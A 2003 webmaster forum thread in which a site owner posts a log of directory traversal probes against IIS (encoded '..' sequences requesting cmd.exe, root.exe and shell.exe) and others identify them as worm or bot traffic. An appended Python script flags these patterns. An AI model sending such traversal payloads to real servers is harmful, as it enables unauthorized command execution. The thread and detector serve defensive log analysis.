
Search Engine Spider and User Agent Identification Forum

    
Indy Library - Chinese Spambot?
strange entries in my log file
bashyam

10+ Year Member



 
Msg#: 1864 posted 6:19 am on Apr 21, 2003 (gmt 0)

Hi,

I found these unrelated entries in my logs frequently... could anyone let me know what it is?
------------------------------------------------------------
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:11 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:12 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:13 -0400] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:14 -0400] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:15 -0400] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:18 -0400] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:19 -0400] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:22 -0400] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:23 -0400] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:24 -0400] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:25 -0400] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:28 -0400] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:30 -0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:31 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:32 -0400] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:33 -0400] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:34 -0400] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:35 -0400] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:36 -0400] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:37 -0400] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:46 -0400] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:47 -0400] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:48 -0400] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:50 -0400] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:51 -0400] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:52 -0400] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:53 -0400] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:54 -0400] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:55 -0400] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:56 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:57 -0400] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:00 -0400] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:06 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:11 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:12 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:13 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:16 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:18 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
------------------------------------------------------------

Thanks..

Balaji.

 

jrobbio

10+ Year Member



 
Msg#: 1864 posted 6:42 am on Apr 21, 2003 (gmt 0)

It's a Chinese spam bot. Please be more selective with the category you choose for your posts. This is the Google section.

kwngian

10+ Year Member



 
Msg#: 1864 posted 8:15 am on Apr 21, 2003 (gmt 0)

>It's a Chinese spam bot.

It is a "compromised" spam bot.

The IP address says it's Canadian.

Even the spammers have their day for having an unpatched Windows machine.

[edited by: kwngian at 10:26 am (utc) on April 21, 2003]

bashyam

10+ Year Member



 
Msg#: 1864 posted 8:51 am on Apr 21, 2003 (gmt 0)

Thanks for your reply.

Also, sorry to post this at Google section... by mistake I did that.

Balaji.

sullen

10+ Year Member



 
Msg#: 1864 posted 9:12 am on Apr 21, 2003 (gmt 0)

Don't know where the Chinese spam bot idea came from - it's a machine infected with the Code Red / Nimda worm.

You can't block it. The best thing to do is look up the IP address to find out which company hosts the machine and then write to them.

bull

10+ Year Member



 
Msg#: 1864 posted 9:57 am on Apr 21, 2003 (gmt 0)

24.226.39.127 is not Chinese:
Cogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1)
24.226.0.0 - 24.226.127.255

Apart from this, Indy Library is a candidate blocked by many here: [webmasterworld.com...]

jan

jrobbio

10+ Year Member



 
Msg#: 1864 posted 10:13 am on Apr 21, 2003 (gmt 0)

The Chinese bot thing came from a site and I quote:

> Originally, the Indy Library is a programming library which is available at http://www.nevrona.com/Indy or http://indy.torry.net under an Open Source license. This library is included with Borland Delphi 6, 7, C++Builder 6, plus all of the Kylix versions. Unfortunately, this library is hi-jacked and abused by some Chinese spam bots. All recent user-agents with the unmodified "Indy Library" string were of Chinese origin.

sullen

10+ Year Member



 
Msg#: 1864 posted 12:03 pm on Apr 21, 2003 (gmt 0)

Righty - missed the "Indy Library" part - I was just going on the addresses it's trying to hit.

I would say contact the host is still the best advice though.
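
Added example, not part of the original thread: a small log triage script that flags the request patterns visible in the log above (repeated percent-encoding, overlong UTF-8 bytes, `..` sequences, and requests for `cmd.exe`, `root.exe` or `shell.exe`) and groups them by client IP. The function names `classify` and `summarize` and the reason labels are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache combined log format: client IP, request path, user agent.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
# Bytes that never occur in well-formed UTF-8 (C0, C1, F8-FF) or that begin an
# overlong 3- or 4-byte form, as in the %c0%af and %e0%80%af requests above.
OVERLONG = re.compile(rb'[\xc0\xc1\xf8-\xff]|\xe0[\x80-\x9f]|\xf0[\x80-\x8f]')
TARGET = re.compile(rb'(cmd|root|shell)\.exe', re.I)

def classify(path):
    """Return the set of reasons a request path looks like a traversal probe."""
    data = path.split('?', 1)[0].encode('latin-1', 'replace')
    rounds = 0
    while rounds < 5:                      # percent-decode until stable (bounded)
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    checks = {'multi-encoded': rounds >= 2,          # %255c -> %5c -> backslash
              'overlong-utf8': bool(OVERLONG.search(data)),
              'dot-dot': b'..' in data,
              'exe-target': bool(TARGET.search(data))}
    return {name for name, hit in checks.items() if hit}

def summarize(lines):
    """Group flagged requests by client IP: hit count, reasons, user agents."""
    out = defaultdict(lambda: {'hits': 0, 'reasons': set(), 'agents': set()})
    for line in lines:
        m = LINE.match(line)
        reasons = classify(m.group(2)) if m else set()
        if reasons:
            out[m.group(1)]['hits'] += 1
            out[m.group(1)]['reasons'] |= reasons
            out[m.group(1)]['agents'].add(m.group(3))
    return dict(out)

# First three lines are copied from the log in the thread; the last is a constructed benign request.
SAMPLE = [
    '24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '192.0.2.10 - - [21/Apr/2003:00:50:00 -0400] "GET /docs/a%20b.html HTTP/1.1" 200 512 "-" "ExampleBrowser/1.0"',
]

if __name__ == '__main__':
    for ip, info in summarize(SAMPLE).items():
        print(ip, info['hits'], sorted(info['reasons']))
```

The byte check is a heuristic: a site that serves Latin-1 encoded URLs can see bytes such as C0 or C1 in legitimate paths, so treat `overlong-utf8` on its own as a prompt to look at the request, not as proof.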
